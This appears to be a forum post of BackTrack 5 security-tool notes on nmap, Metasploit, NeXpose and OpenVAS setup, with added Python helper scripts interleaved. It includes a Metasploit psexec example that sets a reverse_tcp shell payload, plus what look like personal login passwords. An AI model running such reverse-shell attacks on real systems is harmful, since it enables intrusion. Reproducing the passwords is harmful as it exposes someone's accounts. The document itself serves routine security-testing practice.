Summary of common tool operation tips in BT5
4561 views · 0 replies
Use nmap, Nessus, OpenVAS and NeXpose to obtain CVE and BID identifiers and the other descriptive information, then search exploit-db.com and 1337.com to see whether attack code exists.
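The triage step just described can be done from the scanner's machine-readable output instead of by reading reports by hand. The script below is an added example, not code from the original post: it parses nmap's XML output (the `-oX` format written by `nmap -A`) and collects, per open port, every CVE and BID identifier that NSE script output cites, which is the list you would then look up. The report text is constructed for the example and its identifiers (CVE-0000-0001, BID:00000) are placeholders; closed ports are skipped and host-level scripts are kept under port 0 so nothing they cite is lost.

```python
"""Collect CVE / BID references per open port from an nmap XML (-oX) report.

Added example, not from the original post. The XML structure is nmap's own
(-oX output of `nmap -A`); the report below is constructed by hand, and the
identifiers in it (CVE-0000-0001, BID:00000) are placeholders.
"""
import re
import xml.etree.ElementTree as ET

# Constructed sample report: one host, two open ports and one closed one.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A -T4 -p 135,139,445 -oX scan.xml 192.0.2.10">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135">
        <state state="open"/>
        <service name="msrpc" product="Microsoft Windows RPC"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="closed"/>
        <service name="netbios-ssn"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
        <script id="example-vuln-check" output="VULNERABLE (placeholder finding)&#10;  References: CVE-0000-0001 BID:00000"/>
      </port>
    </ports>
    <hostscript>
      <script id="smb-os-discovery" output="OS: placeholder"/>
    </hostscript>
  </host>
</nmaprun>
"""

CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b")
BID_RE = re.compile(r"\bBID:\s*(\d+)\b")


def _entry(service, scripts):
    """Build one finding record from a service name and its <script> elements."""
    e = {"service": service, "cve": set(), "bid": set()}
    for s in scripts:
        out = s.get("output", "")  # nmap stores NSE output in the 'output' attribute
        e["cve"].update(CVE_RE.findall(out))
        e["bid"].update(BID_RE.findall(out))
    return e


def parse_findings(xml_text):
    """Map (address, port) -> {"service", "cve", "bid"} for every open port.

    Host-level NSE scripts (<hostscript>) are attached under port 0.
    """
    root = ET.fromstring(xml_text)
    findings = {}
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        addr = addr_el.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed / filtered ports carry nothing to triage
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            findings[(addr, int(port.get("portid")))] = _entry(name, port.iter("script"))
        hostscripts = list(host.iter("hostscript"))
        if hostscripts:
            findings[(addr, 0)] = _entry("host", hostscripts[0].iter("script"))
    return findings


def identifiers_to_lookup(findings):
    """Sorted, de-duplicated list of identifiers to check in a vulnerability database."""
    ids = set()
    for e in findings.values():
        ids.update(e["cve"])
        ids.update("BID-" + b for b in e["bid"])
    return sorted(ids)


if __name__ == "__main__":
    f = parse_findings(SAMPLE_NMAP_XML)
    for (addr, port), e in sorted(f.items()):
        print(f"{addr}:{port:<5} {e['service']:<14} CVE={sorted(e['cve'])} BID={sorted(e['bid'])}")
    print("look up:", identifiers_to_lookup(f))
```

Run it against a real report with `parse_findings(open("scan.xml").read())`; the regexes only pick up identifiers that NSE scripts actually print, so a port with no matching script produces empty sets rather than a false finding.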
0. Firewall: ufw, gufw

Metasploit Framework (MSF):
  exploits: modules that use a PAYLOAD; modules that do not use a PAYLOAD are Auxiliary
  payload: the code that runs on the remote target host
  encoders: help the PAYLOAD reach the target host
  Nops: pad the PAYLOAD out to the required size

############################

For Nessus-generated reports, choose the .nessus (v1) format.

Example of using an exploit:
  1) use exploit/windows/smb/psexec
     set RHOST remoteip
     set PAYLOAD windows/shell/reverse_tcp   # set the payload, i.e. the code that runs on the remote target host; usually one that provides a remote network service or a reverse connection
     set LHOST listenip                      # must be set when the PAYLOAD is a reverse connection
     set LPORT 4444
     set etc…
     exploit

########################################################################

1. NeXpose
The scanner from Rapid7, which acquired MSF; it pairs with MSF, and exploitable vulnerabilities carry links to the matching MSF exploits.
NeXpose's default PostgreSQL user is nxpgsql; port: 3780; scanning is limited to 8 hosts.
For generated reports choose the "nexpose simple xml" format.
nxadmin:A

Starting:
  Go to the directory that contains the script that starts NeXpose:
    $ cd [installation_directory]/nsc
  Type the command to run the script:
    $ ./nsc.sh
  The background messages can be seen as it runs. Alternatively, start it with:
    /etc/init.d/nexposed restart
  Web access: http://ip:3780

Where nexposed comes from (quoted from the NeXpose Software Installation and Quick-start Guide, page 16):
  $ cd [installation_directory]/nsc
  Open the nexposeconsole.rc file in your preferred text editing program. Look for two consecutive lines that read:
    #defines
    NXP_ROOT=/opt/rapid7/nexpose
  The directory in the second line is the default installation directory. If you did not use the default directory for installation, change the directory path to the one you chose:
    #defines
    NXP_ROOT=[installation_directory]
  Save and close the nexposeconsole.rc file.
  Copy the nexposeconsole.rc file to the /etc/init.d directory, and give it the desired daemon name:
    $ cp [installation_directory]/nexposeconsole.rc /etc/init.d/[daemon_name]
  Ensure that the daemon can run:
    $ chmod +x /etc/init.d/[daemon-name]
  Make the daemon start when the operating system starts:
    $ update-rc.d [daemon_name] defaults
  Manually starting, stopping, or restarting NeXpose as a daemon in Ubuntu. To manually start, stop, or restart NeXpose as a daemon:
    $ /etc/init.d/[daemon_name] <start|stop|restart>

Uninstalling NeXpose:
  1. Make sure to stop NeXpose. Otherwise, errors will occur when you reinstall the program. If you are not running NeXpose as a daemon, simply type the quit command, and press Enter in the shell in which you are running NeXpose. If you are running NeXpose as a daemon, see "Manually starting, stopping, or restarting NeXpose as a daemon in Ubuntu" (on page 16).
  2. Run the command to remove the program:
    $ rm -fr [installation_directory]

####################################################

2. OpenVAS
Login notes: root:shift(AB); local id pwd is A; wangql:wangql#@!

Starting; enter on the command line:
  openvassd
  openvasmd
  openvasad
  gsad --http-only -a 127.0.0.1 -p 9392

openvasmd: the manager, port 9390.
  openvasmd [OPTION...] – Manager of the Open Vulnerability Assessment System
gsad: Greenbone Security Assistant daemon, port 9392.
  gsad --http-only -a 127.0.0.1 -p 9392   # only started this way can gsad be reached from the web
Caution: there is a conflict between NeXpose and OpenVAS, especially with the above gsad command, so uninstall NeXpose before using gsad.
openvasad: the administrator, used to add users; port 9393.
Ports: 9390, 9391, 9392, 9393

  FIX: Start OpenVAS Scanner (openvassd).
  FIX: Start OpenVAS Manager (openvasmd).
  FIX: Start OpenVAS Administrator (openvasad).
  FIX: Start Greenbone Security Assistant (gsad).

####################################################

3. Nessus

4. nmap
  nmap -A -T4 192.168.10.3-254 -p 135

5. load xmlrpc
  Then open it with Armitage. The msf console does not support displaying Chinese encodings.
  info exploit/windows/wins/ms04_045_ins
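The NeXpose daemon-install steps quoted above (point NXP_ROOT in nexposeconsole.rc at the chosen directory, copy the file to /etc/init.d under the daemon name, make it executable) can be scripted so that the edit is verified instead of done by hand. The Python below is an added example, not from the original post or from Rapid7's guide. It assumes only what the guide states, a line reading `#defines` followed by a line `NXP_ROOT=/opt/rapid7/nexpose`; the sample file contents, the install directory `/srv/nexpose` and the daemon name `nexposed` are constructed for the demonstration, and the `update-rc.d` step is left to the operator.

```python
"""Script the NeXpose daemon-install steps from the guide: fix NXP_ROOT, copy, chmod +x.

Added example, not from the original post or from Rapid7's guide. Only the
'#defines' / 'NXP_ROOT=...' pair is taken from the guide; everything else in
SAMPLE_RC, and the paths used below, are constructed placeholders.
"""
import os
import stat
import tempfile

DEFAULT_ROOT = "/opt/rapid7/nexpose"

# Constructed stand-in for nexposeconsole.rc; the real file has more content.
SAMPLE_RC = """#!/bin/sh
# constructed stand-in for nexposeconsole.rc
#defines
NXP_ROOT=/opt/rapid7/nexpose
# ... service start/stop logic would follow here ...
"""


def set_nxp_root(rc_text, install_dir):
    """Return rc_text with the NXP_ROOT line that follows '#defines' pointed at install_dir.

    Raises ValueError unless exactly one marker pair is present, so a file of
    unexpected layout is never silently copied into /etc/init.d unchanged.
    """
    lines = rc_text.splitlines()
    changed = 0
    for i in range(1, len(lines)):
        if lines[i - 1].strip() == "#defines" and lines[i].startswith("NXP_ROOT="):
            lines[i] = "NXP_ROOT=" + install_dir
            changed += 1
    if changed != 1:
        raise ValueError(f"expected exactly one '#defines'/'NXP_ROOT=' pair, found {changed}")
    return "\n".join(lines) + "\n"


def install_daemon(rc_path, install_dir, daemon_name, init_dir="/etc/init.d"):
    """Copy the rewritten rc file to init_dir/daemon_name and set the execute bits.

    Mirrors the guide's 'cp ... /etc/init.d/[daemon_name]' and 'chmod +x'
    steps; 'update-rc.d [daemon_name] defaults' is intentionally not run here.
    """
    with open(rc_path, encoding="utf-8") as fh:
        text = fh.read()
    if install_dir == DEFAULT_ROOT:
        new_text = text  # default install directory: the guide leaves the line as it is
    else:
        new_text = set_nxp_root(text, install_dir)
    dst = os.path.join(init_dir, daemon_name)
    with open(dst, "w", encoding="utf-8") as fh:
        fh.write(new_text)
    os.chmod(dst, os.stat(dst).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return dst


def is_executable(path):
    """True if the owner execute bit is set (what 'chmod +x' guarantees)."""
    return bool(os.stat(path).st_mode & stat.S_IXUSR)


if __name__ == "__main__":
    # Demo in a temporary directory standing in for /etc/init.d.
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "nexposeconsole.rc")
        with open(src, "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_RC)
        dst = install_daemon(src, "/srv/nexpose", "nexposed", init_dir=tmp)
        print(open(dst, encoding="utf-8").read())
        print("executable:", is_executable(dst))
        print("next step (as root): update-rc.d nexposed defaults")
```

On a real system the call is `install_daemon("[installation_directory]/nexposeconsole.rc", "[installation_directory]", "nexposed")` run as root, followed by the guide's `update-rc.d` command; the ValueError guard is what keeps a mismatched file from ending up in /etc/init.d.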
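The OpenVAS daemons above each listen on their own port (9390 openvasmd, 9392 gsad, 9393 openvasad; 9391 appears in the port list without a name and is openvassd's default), and the notes warn that NeXpose on 3780 conflicts with gsad. The following Python is an added example, not from the original post or the OpenVAS project: it probes those loopback ports, prints the FIX: line quoted above for every daemon that is not up, and flags the NeXpose/gsad clash. The port names come from the notes; the probe is a plain TCP connect and is assumed to run on the scanner host itself.

```python
"""Report which OpenVAS / NeXpose daemons are reachable on the local host.

Added example, not from the original post or the OpenVAS project. Port
assignments follow the notes above; 9391 is openvassd's default listening
port. Meant to run on the scanner host itself (probes 127.0.0.1).
"""
import socket

# port -> daemon (from the notes above; 9391 -> openvassd is the scanner's default)
DAEMON_PORTS = {
    9391: "openvassd",
    9390: "openvasmd",
    9393: "openvasad",
    9392: "gsad",
    3780: "NeXpose",
}

# The FIX: lines quoted in the notes, keyed by the port of the missing daemon.
FIX_LINES = {
    9391: "FIX: Start OpenVAS Scanner (openvassd).",
    9390: "FIX: Start OpenVAS Manager (openvasmd).",
    9393: "FIX: Start OpenVAS Administrator (openvasad).",
    9392: "FIX: Start Greenbone Security Assistant (gsad).",
}


def port_open(host, port, timeout=0.5):
    """True if a TCP connection to host:port succeeds, i.e. something is listening."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        return sock.connect_ex((host, port)) == 0


def daemon_status(host="127.0.0.1", ports=DAEMON_PORTS, probe=port_open):
    """Map port -> bool for every port in `ports`; `probe` is injectable for tests."""
    return {port: probe(host, port) for port in ports}


def diagnose(status):
    """Turn a status map into action lines: one FIX: per missing OpenVAS daemon,
    plus a note on the NeXpose/gsad conflict described in the notes."""
    lines = [FIX_LINES[p] for p in (9391, 9390, 9393, 9392) if not status.get(p, False)]
    nexpose_up = status.get(3780, False)
    if nexpose_up and status.get(9392, False):
        lines.append("WARNING: NeXpose (3780) and gsad (9392) are both listening; "
                     "the notes say they conflict, so stop or uninstall NeXpose.")
    elif nexpose_up:
        lines.append("NOTE: NeXpose is listening on 3780; uninstall it before starting gsad.")
    return lines


if __name__ == "__main__":
    status = daemon_status()
    for port, name in DAEMON_PORTS.items():
        print(f"{name:<10} {port}  {'up' if status[port] else 'DOWN'}")
    for line in diagnose(status) or ["all OpenVAS daemons up, no NeXpose conflict"]:
        print(line)
```

Start the daemons in the order the notes give (openvassd, openvasmd, openvasad, then gsad) and re-run the script until `diagnose` returns nothing; a port that is "up" only proves a listener exists, so a gsad that starts but is not reachable from a browser still needs the `--http-only -a 127.0.0.1 -p 9392` options from the notes.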